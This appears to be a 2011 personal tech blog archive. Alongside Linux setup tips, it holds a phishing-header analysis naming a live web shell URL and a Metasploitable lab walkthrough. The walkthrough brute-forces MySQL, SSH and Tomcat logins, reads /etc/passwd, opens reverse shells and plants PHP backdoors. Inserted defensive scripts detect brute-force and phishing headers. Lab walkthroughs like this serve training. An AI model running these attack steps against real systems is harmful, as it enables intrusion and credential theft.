9/21/2011

Evernote and Nix/NeverNote on Ubuntu 10.04

Evernote is a great tool. I absolutely love it. The only con is that it's not available natively for Linux, so I have to run it under the Windows emulator, Wine. The installation is fairly simple.
  1. wget http://evernote.s3.amazonaws.com/win4/public/Evernote_4.5.0.5229.exe
  2. wine Evernote_4.5.0.5229.exe
Obviously, not running natively, there is a slight performance lag. This may be attributed to my 5 year old laptop. Although it's still usable, the slow synchronization soon becomes tiresome. Fortunately there is a Linux native client called NeverNote[2].
  1. sudo add-apt-repository ppa:vincent-c/nevernote
  2. sudo apt-get update
  3. sudo apt-get install nevernote
  4. nixnote
NixNote is a bit ugly, but functional. Definitely faster than running Evernote in emulation. The feature that I like best is that you are able to encrypt the NixNote database using AES when you shut down. This is a definite plus in my books.

Therefore, if you can live with the degraded performance, then Evernote will do, but if you need to work faster, want that extra bit of security, and an ugly interface does not bother you, then give NixNote (aka NeverNote) a try.

References:
  1. http://www.howtogeek.com/howto/35661/how-to-install-evernote-4.0-in-ubuntu-using-wine/
  2. http://www.techdrivein.com/2011/06/nevernote-open-source-evernote-clone.html

Cisco console from Ubuntu 10.04

It's pretty easy to set up Cisco serial console connectivity on Ubuntu 10.04. The usual way is to use minicom. The serial ports, usually called COM1-4, have the following I/O addresses:
  1. COM1 - 3E8
  2. COM2 - 2F8
  3. COM3 - 3E8
  4. COM4 - 2E8
To complete the setup, first determine the address used for COM1 (or whichever serial port you wish to use) on your machine by querying the kernel ring buffer with the dmesg command, then install and configure minicom, the modem emulation tool.
  1. sudo dmesg | grep tty
  2. sudo apt-get install minicom
  3. sudo minicom -s # Configure the terminal to use 9600-8-N-1 and save as dfl
  4. sudo minicom

References:
  1. https://help.ubuntu.com/community/CiscoConsole
  2. http://useopensource.blogspot.com/2007/01/using-cisco-console-in-linux.html

9/20/2011

KeePass on Ubuntu 10.04

KeePass is a very popular password management software. One of my clients uses this for their systems and I was given a copy of their database. Since I mostly use Linux when I am working, I needed a way to get this working on Ubuntu 10.04. Instructions are widely available, but again for my benefit, I have documented them here as a step-by-step guide for myself. At the time of this blog post the 2.x version of KeePass was 2.16.

Firstly install Mono. For more details refer to the Badger ports website[1].
  1. Edit the /etc/apt/sources.list file
    • Add the lines
      • # For mono 2.6 -> needed by KeePass
      • deb http://badgerports.org lucid main
  2. cd /etc/apt
  3. sudo wget http://badgerports.org/directhex.ppa.asc
  4. sudo apt-key add directhex.ppa.asc
  5. sudo apt-get update
  6. sudo apt-get install mono mono-devel
  7. mono --version
    • # Confirm the mono version is >= 2.6
Download and install KeePass from the KeePass website[2].
  1. sudo mkdir -p /opt/KeePass2
  2. cd /opt/KeePass2
  3. wget http://downloads.sourceforge.net/keepass/KeePass-2.16.zip
  4. sudo unzip KeePass-2.16.zip
Execute the KeePass application
  1. mono /opt/KeePass2/KeePass.exe &
There does appear to be a lot of debug information (I am assuming it's debug information) written to the terminal, but this should be safe to ignore.

References:
  1. http://badgerports.org
  2. http://keepass.info

9/15/2011

SPAM - Westpac Notice

I recently got an email with the subject "[Bulk] Westpac Notice" claiming to be from "notice@westpac.com.au". I knew this was SPAM, but was curious nonetheless. I felt like investigating further but didn't have much time... my curiosity got the better of me, and I decided to do some quick digging anyway.


The link on the email resolved to "http://www.backrite.com/cw3/assets/product_small/Westpac.com.au/Westpac/index.htm". A very crude attempt, I thought; the least they could have done was attempt to get a domain that at least appears slightly legitimate, or use a URL shortening service.

I fired up my debugging VM, opened up Firefox and pasted the URL in; the site appeared to be down. This was going to be quicker than I thought. Next I examined the e-mail headers and found a number of interesting things:


X-Apparently-To: me@me.com via 76.13.9.102; Mon, 12 Sep 2011 17:35:43 -0700
X-YahooFilteredBulk: 72.52.199.90
Received-SPF: none (domain of server22.01domain.net does not designate permitted sender hosts)
X-YMailISG: uqaL3oQWLDupZk39g7NZ_d1X.jvu2AiRfqDcSAS5WI1yggQj
 qKsr_wBhJ6fOB576uyrk3sOva0uAvBRbH2D9buWQ2RMJpgB.gBvrBbexkVVz
 XhkFvqbM2oAMn_GHLmNEOUb_wcs6rU031UCGN0Gc8InmvAhB8wE6ua0shbqw
 gqobfvaLzFTrjLeJ03BlqKdv3L_RDh4xyyLL2saipKDl7XkbKwLizqsr4c6R
X-Originating-IP: [72.52.199.90]
Authentication-Results: mail.me.com  from=westpac.com.au; domainkeys=neutral (no sig);  from=westpac.com.au; dkim=neutral (no sig)
Received: from 127.0.0.1  (EHLO server22.01domain.net) (72.52.199.90)
  by mail.me.com with SMTP; Mon, 12 Sep 2011 17:35:42 -0700
Received: from nobody by server22.01domain.net with local (Exim 4.69)
(envelope-from )
id 1R3GyS-0001kr-68
for me@me.com; Mon, 12 Sep 2011 20:35:40 -0400
To: me@me.com
Subject: [Bulk] Westpac Notice
X-PHP-Script: proteinat.com/store/images/tmp/z.php for 41.184.112.91
From:  
Reply-To: 
MIME-Version: 1.0
Content-Type: text/html
Content-Transfer-Encoding: 8bit
Message-Id:
Date: Mon, 12 Sep 2011 20:35:40 -0400
X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
X-AntiAbuse: Primary Hostname - server22.01domain.net
X-AntiAbuse: Original Domain - me.com
X-AntiAbuse: Originator/Caller UID/GID - [99 99] / [47 12]
X-AntiAbuse: Sender Address Domain - server22.01domain.net

Firstly, the originating IP did not match the server in the URL. Next, the X-PHP-Script header gave an interesting clue: a copy and paste revealed another downed script, but this time the response from the server was more promising; a quick fuzz and I found "http://proteinat.com/store/images/cookie_load.php".

This is a PHP shell called Web Shell by oRb, or WSO. The running version was 2.5, which was released in June of 2011. The attacker must have exploited PHP and uploaded the file. The PHP shell allows for a console, which is useful for work, e.g. creating a backdoor, as well as for running exploits to escalate privileges to get root access. I have not had the chance to investigate further, but it would be interesting to determine how the hacker got in in the first place.
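As an added example, not code from the original post, the following Python script applies the triage done above to the quoted headers: it compares the From: domain with the host that handed the mail to the receiving MTA (the only Received: line that can be trusted), reads the SPF and DKIM results, and pulls apart the X-PHP-Script header that pointed at the compromised web host. The header sample is copied from the dump above, except that the From: value, elided in the dump, is filled from the prose.

```python
import re
from email import message_from_string
from email.utils import parseaddr

# Headers copied from the phishing e-mail dump above (only the fields used
# here); the From: value, elided in the dump, is filled from the prose.
SAMPLE_HEADERS = """\
Received-SPF: none (domain of server22.01domain.net does not designate permitted sender hosts)
Authentication-Results: mail.me.com  from=westpac.com.au; domainkeys=neutral (no sig);  from=westpac.com.au; dkim=neutral (no sig)
Received: from 127.0.0.1  (EHLO server22.01domain.net) (72.52.199.90)
  by mail.me.com with SMTP; Mon, 12 Sep 2011 17:35:42 -0700
Received: from nobody by server22.01domain.net with local (Exim 4.69)
  for me@me.com; Mon, 12 Sep 2011 20:35:40 -0400
X-PHP-Script: proteinat.com/store/images/tmp/z.php for 41.184.112.91
From: notice@westpac.com.au

"""

EHLO_RE = re.compile(r"\(EHLO ([^)\s]+)\)\s*\(([\d.]+)\)")
PHP_SCRIPT_RE = re.compile(r"^([^/\s]+)(/\S*)\s+for\s+([\d.]+)")


def claimed_domain(msg):
    # Domain the From: header claims (what the victim sees), lower-cased.
    addr = parseaddr(msg.get("From", ""))[1]
    return addr.rsplit("@", 1)[-1].lower() if "@" in addr else ""


def handoff_host(msg):
    # (EHLO name, IP) of the host that handed the mail to our own MTA.
    # Only the Received: line our MTA wrote is trusted; earlier hops are
    # text the sender controls, so they are not used for the verdict.
    for rcvd in msg.get_all("Received", []):
        m = EHLO_RE.search(rcvd)
        if m:
            return m.group(1).lower(), m.group(2)
    return "", ""


def php_script(msg):
    # (web host, script path, requesting client) recorded by a PHP mailer.
    m = PHP_SCRIPT_RE.match(msg.get("X-PHP-Script", "").strip())
    return (m.group(1), m.group(2), m.group(3)) if m else None


def analyse(raw_headers):
    # Return the indicators a triager would note for this message.
    msg = message_from_string(raw_headers)
    domain, (ehlo, ip), findings = claimed_domain(msg), handoff_host(msg), []
    if ehlo and domain and ehlo != domain and not ehlo.endswith("." + domain):
        findings.append("from-domain-mismatch")
    spf = (msg.get("Received-SPF", "").split() or ["missing"])[0].lower()
    if spf != "pass":
        findings.append("spf-" + spf)
    if "dkim=pass" not in msg.get("Authentication-Results", "").lower():
        findings.append("dkim-not-passed")
    script = php_script(msg)
    if script:
        findings.append("php-mailer-script")
    return {"claimed_domain": domain, "ehlo": ehlo, "ip": ip, "spf": spf,
            "php_script": script, "findings": findings}
```

The X-PHP-Script host is the abuse contact worth notifying: it names the compromised server and the client address that drove the mailer script, which the sending MTA's own headers do not.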

9/06/2011

IEEETrans on Mac OS X with texlive

While compiling a journal paper, I got the following error message "I couldn't open style file IEEEtran.bst"

The IEEETrans TeX distribution can be manually installed by using the packages from CTAN [1] or IEEE [2]. However, since I use MacPorts, I just had to:
  1. sudo port install texlive-publishers

References:
  1. http://www.ctan.org/tex-archive/macros/latex/contrib/IEEEtran/
  2. http://www.ieee.org/portal/cms_docs/pubs/transactions

9/03/2011

Metasploitable walkthrough

Note: this post will be updated when I have more time. This never happened! The Metasploitable2 walk-through is also available at http://nkush.blogspot.com.au/2015/02/metasploitable2-walk-through.html.

I am sure there are plenty of Metasploitable walkthroughs available, but I thought I'd chuck one up here anyway... Firstly download and unzip the Metasploitable VMware image. I use VirtualBox, and it works just as well. I ran my Metasploitable image and BackTrack in host-only mode, so I had an isolated network to play in without damaging anything else.

For some of the brute force attacks you will need a wordlist of potential usernames and passwords. There are several free wordlists available. Kevin's Wordlist Page [2] is quite good. The generated wordlist should be sufficient for most attacks save for ones with rigorous password complexities enforced.

Note: Since this is just a demonstration/walk-through, the attempts herein to circumvent the security of the host have not been throttled down to prevent detection; in fact the scans and exploits run may be considered extremely noisy.

Discovery
  1. Find the IP address of the metasploitable host 
    • nmap -sn -n -T1 192.168.56.0/24 
  2. In this case the host IP was 192.168.56.101
  3. Scan the metasploitable host to find the OS and services running on it 
    • nmap -n -v -A -O -T1 -sS -sV 192.168.56.101 
    • The following services were identified; 21 running ProFTPD 1.3.1, 22 running OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0), 23 running Linux telnetd, 25 running Postfix smtpd, 53 running ISC BIND 9.4.2, 80 running Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.10 with Suhosin-Patch), 139 running Samba smbd 3.X (workgroup: WORKGROUP), 445 running Samba smbd 3.X (workgroup: WORKGROUP), 3306 running MySQL 5.0.51a-3ubuntu5, 5432 running PostgreSQL DB 8.3.0 - 8.3.7, 8009 running Apache Jserv (Protocol v1.3), 8180 running Apache Tomcat/Coyote JSP engine 1.1 on Host:  metasploitable.localdomain; OSs: Unix, Linux
  4. Search the exploit DB to see if any exploits exist, and run the Metasploit exploit. I have discussed these in detail below. In the majority of cases the exploits already exist in Metasploit and it is just a matter of selecting the correct one and specifying the correct options and parameters.
MySQL
  1. The version according to the nmap scan was MySQL 5.0.51a-3ubuntu5
  2. http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=mysql
  3. Brute force the login
    • search mysql
    • use auxiliary/scanner/mysql/mysql_login
    • show options
    • set THREADS 1000 # adding the brute in brute force
    • set RHOST 192.168.56.101
    • set USERPASS_FILE /opt/msf3/demo-wordlist.txt
    • set STOP_ON_SUCCESS true
    • run
  4. [+] 192.168.56.101:3306 - SUCCESSFUL LOGIN 'root' : 'root'
  5. Install a MySQL client locally and use the credentials to connect to the remote server and get a dump of the DB or run SQL queries, or use another Metasploit module to get the contents of the /etc/passwd file to identify accounts that have shell access
    • back
    • use auxiliary/admin/mysql/mysql_sql
    • show options
    • set USERNAME root
    • set PASSWORD root
    • set RHOST 192.168.56.101
    • set SQL select load_file(\'/etc/passwd\')
    • run
  6. You should now have the contents of the /etc/passwd file
TikiWiki
Using the credentials found using the brute force method above, we can connect using the mysql client, e.g. mysql -u root -p -h 192.168.56.101
  1. Check the databases installed
    • show databases;
  2. Returns the names of the databases: information_schema, mysql, tikiwiki, and tikiwiki195. Guessing from the name, it appears to be a database for a wiki application. A quick Google search (http://info.tiki.org/Tiki+Wiki+CMS+Groupware) confirms this. This too is vulnerable and Metasploit exploits exist.
    • back
    • use exploit/unix/webapp/tikiwiki_graph_formula_exec
    • show options
    • set RHOST 192.168.56.101
    • set PAYLOAD php/meterpreter/reverse_tcp
    • set LHOST 192.168.56.1
    • exploit
  3. This returns the username and password used with the wiki CMS and the meterpreter interface. The meterpreter console is very powerful and extremely useful in further analysis of the host. We may come back to the meterpreter console.
  4. The good thing about wikis and CMSs in general is the ability to load files onto the server. Unfortunately there are two tikiwiki databases in use. Fortunately both have the same details in their users_users table, i.e. a username and password of admin and admin respectively.
  5. There is a requirement for uploading files to the compromised machine for easier access later, i.e. a back door; refer below [3-4]. We can test the upload of a backup by creating a simple file, e.g. phpinfo.php with phpinfo(); in it, uploading it via the backup upload and then navigating to "http://192.168.56.101/tikiwiki/backups/phpinfo.php". If you see the PHP info page, then uploads work and backup PHP files are interpreted by the server.
  6. Now download a PHP shell and upload it for a shell backdoor. Here's a list of potential PHP shells;
Mysql Users

  1. Again using the MySQL credentials, we can query the user table in the mysql database using the mysql client.
    • mysql -u root -proot -h 192.168.56.101
    • use mysql
    • SELECT host, user, password FROM user;
  2. We are presented with an additional user, debian-sys-maint, and the 41-byte hash value (*E07F0A7CCC0044345116513C989F45663C1F8347) of its password.
  3. I tried running john the ripper on this to see if I could crack the password, it was taking too long so I gave up. However you may have better luck, esp. with rainbow tables, etc.
    • The username and password hash were saved in a file e.g. mysql.txt in the following format; username:password, i.e. debian-sys-maint:*E07F0A7CCC0044345116513C989F45663C1F8347
    • john --format=mysql-sha1 mysql.txt
  4. We could also have copied the hash from the root account to the other accounts, as we already know the root password, but the idea is to remain undetected.

Apache
Port 80 has a web server running; we can connect using a browser to confirm and get an "It works!" page. To confirm the structure of the web directories we can use a fuzzer such as OWASP's DirBuster.
  1. The initial scans should confirm the tikiwiki CMS in its structure.

SSH
Based on the contents of the /etc/passwd file, we can now tweak our usernames file before trying to brute force an SSH connection.
  1. Brute force the SSH connection. Unlike the other attempts, we don't want to stop at the first success but get all SSH login details. Note: for this walkthrough example below, I have just used the same file, but you should specify a different user file based on the content of /etc/passwd and a password file to speed things up
    • back
    • use auxiliary/scanner/ssh/ssh_login
    • show options
    • set RHOSTS 192.168.56.101
    • set THREADS 1000
    • set USERPASS_FILE /opt/msf3/demo-wordlist.txt
    • set STOP_ON_SUCCESS false
    • run
  2. [+] 192.168.56.101:22 SSH - [23/30] - Success: 'user':'user' 'uid=1001(user) gid=1001(user) groups=1001(user) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '
  3. [+] 192.168.56.101:22 SSH - [28/30] - Success: 'msfadmin':'msfadmin' 'uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '
  4. [+] 192.168.56.101:22 SSH - [29/30] - Success: 'service':'service' 'uid=1002(service) gid=1002(service) groups=1002(service) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '
  5. [+] 192.168.56.101:22 SSH - [30/30] - Success: 'postgres':'postgres' 'uid=108(postgres) gid=117(postgres) groups=114(ssl-cert),117(postgres) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '
  6. Now we have shell access based on a number of logins
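From the defender's side, as an added example that is not part of the original walkthrough: a run like the ssh_login module above lands in the target's sshd log as a burst of "Failed password" lines followed by "Accepted password" lines from the same source. The Python script below, run over constructed auth.log lines modelled on that (hostname, accounts and IPs taken from the walkthrough), flags source addresses that exceed a failure threshold inside a time window and reports which accounts they went on to log in as.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample of OpenSSH auth.log lines, modelled on what a run like the
# ssh_login module above leaves behind (hostname, accounts and IPs from the post).
SAMPLE_LOG = """\
Sep  3 10:15:01 metasploitable sshd[4021]: Failed password for invalid user admin from 192.168.56.1 port 51022 ssh2
Sep  3 10:15:01 metasploitable sshd[4023]: Failed password for root from 192.168.56.1 port 51023 ssh2
Sep  3 10:15:02 metasploitable sshd[4025]: Failed password for invalid user test from 192.168.56.1 port 51024 ssh2
Sep  3 10:15:02 metasploitable sshd[4027]: Failed password for user from 192.168.56.1 port 51025 ssh2
Sep  3 10:15:02 metasploitable sshd[4029]: Failed password for msfadmin from 192.168.56.1 port 51026 ssh2
Sep  3 10:15:03 metasploitable sshd[4031]: Accepted password for user from 192.168.56.1 port 51027 ssh2
Sep  3 10:15:03 metasploitable sshd[4033]: Accepted password for msfadmin from 192.168.56.1 port 51028 ssh2
Sep  3 10:20:44 metasploitable sshd[4101]: Accepted publickey for msfadmin from 192.168.56.50 port 40112 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Accepted|Failed) (?:password|publickey) for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>[\d.]+) port \d+"
)


def parse(log, year=2011):
    # syslog lines carry no year, so the caller supplies it
    events = []
    for line in log.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
            events.append((ts, m["ip"], m["user"], m["result"] == "Accepted"))
    return events


def brute_force_sources(events, threshold=5, window_s=60):
    # Source IPs with at least `threshold` failures inside `window_s` seconds,
    # plus the accounts they logged into after the burst began (the case that
    # needs an incident response, not just a firewall rule).
    by_ip = defaultdict(list)
    for ts, ip, user, ok in events:
        by_ip[ip].append((ts, user, ok))
    alerts = {}
    for ip, evs in by_ip.items():
        evs.sort()
        fails = [ts for ts, _, ok in evs if not ok]
        start = 0
        for end in range(len(fails)):  # sliding window over failure times
            while (fails[end] - fails[start]).total_seconds() > window_s:
                start += 1
            if end - start + 1 >= threshold:
                logins = sorted({u for ts, u, ok in evs if ok and ts >= fails[start]})
                alerts[ip] = {"failures": len(fails), "logins_after_burst": logins}
                break
    return alerts
```

Note that the walkthrough runs ssh_login with STOP_ON_SUCCESS false, so several accounts are logged into from one source within seconds of the failures; a source with failures but no subsequent login is still an alert, just a lower-priority one.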

Tomcat
  1. Brute force the management login
    • back
    • use auxiliary/scanner/http/tomcat_mgr_login
    • show options
    • set RHOSTS 192.168.56.101
    • set RPORT 8180
    • exploit
  2. [+] http://192.168.56.101:8180/manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] successful login 'tomcat' : 'tomcat'
  3. Get a shell by exploiting the host, using the weak password found by the scanner to deploy a payload
    • back
    • use exploit/multi/http/tomcat_mgr_deploy
    • show options
    • set USERNAME tomcat
    • set PASSWORD tomcat
    • set RPORT 8180
    • set PAYLOAD linux/x86/shell_reverse_tcp
    • set STOP_ON_SUCCESS true
    • exploit
  4. Should have shell now!
DistCC
This was discovered on a subsequent port scan using different parameters. I am not quite sure what it is, but there is an exploit in Metasploit, and the Wikipedia documentation indicated it's some sort of distributed compiler for C and C++.

  1. The number of payloads are limited for this exploit, but still allow remote shell access
    • back
    • search distcc
    • use exploit/unix/misc/distcc_exec
    • show options
    • set RHOST 192.168.56.101
    • set PAYLOAD cmd/unix/reverse
    • set LHOST 192.168.56.1
    • exploit

Files
Here's a list of interesting files I found on the system; I hope to add more detailed descriptions and discuss their contents once I have the opportunity to investigate further.
  1. /root/reset_logs.sh

Requirements:
  1. Metasploit (I used BackTrack 5)
  2. nmap
  3. Metasploitable

References:
  1. http://www.exploit-db.com
  2. http://wordlist.sourceforge.net/
  3. http://www.gnucitizen.org/blog/reverse-shell-with-bash/
  4. http://www.plenz.com/reverseshell

9/02/2011

Metasploit presentation for CTF

We had a CTF training at the labs today, where I tried to present a brief introduction to Metasploit. I seriously doubt I did the tool any justice, but a colleague has requested a copy of the slides as a PDF document. I have uploaded the slides to http://www.kush.com.fj/resources/metasploit-presentation.pdf. The presentation was mostly a demo using Metasploitable. Perhaps in future there may be an opportunity to do a complete walk-through of the Metasploitable image posted here. I started work on a Metasploitable walkthrough; it's still incomplete, but it's a start. You can find the walk-through here: http://nkush.blogspot.com/2011/09/metasploitable-walkthrough.html


Installing Metasploit 4.0.0 on Apple Mac OS X 10.6.8

The installation instructions are quite well documented on the Rapid7 documentation site[1], but in my usual style of duplicating data on the Internet, I have documented my efforts below. The key requirements of Xcode and MacPorts were already addressed on this particular machine :)

Note: It's important to ensure that any anti-virus (AV) software is temporarily disabled and appropriate scanning exceptions added; this is to prevent the AV from quarantining the exploits and payloads that come with Metasploit.

  1. sudo bash
  2. port selfupdate
  3. port install ruby19 +nosuffix
  4. echo $PATH # Ensure that /opt/local/bin appears before /usr/bin, else edit ~/.bash_profile file and source it; ". ~/.bash_profile" or "source ~/.bash_profile"
  5. port install mysql5-server
  6. gem install mysql
  7. cd /opt
  8. wget http://updates.metasploit.com/data/releases/framework-4.0.0.tar.bz2
  9. bunzip2 framework-4.0.0.tar.bz2
  10. tar xvf framework-4.0.0.tar
  11. cd msf3
  12. svn update
  13. ln -s /opt/msf3/msf* /opt/local/bin/

References:
  1. https://community.rapid7.com/docs/DOC-1037
  2. http://www.metasploit.com/download/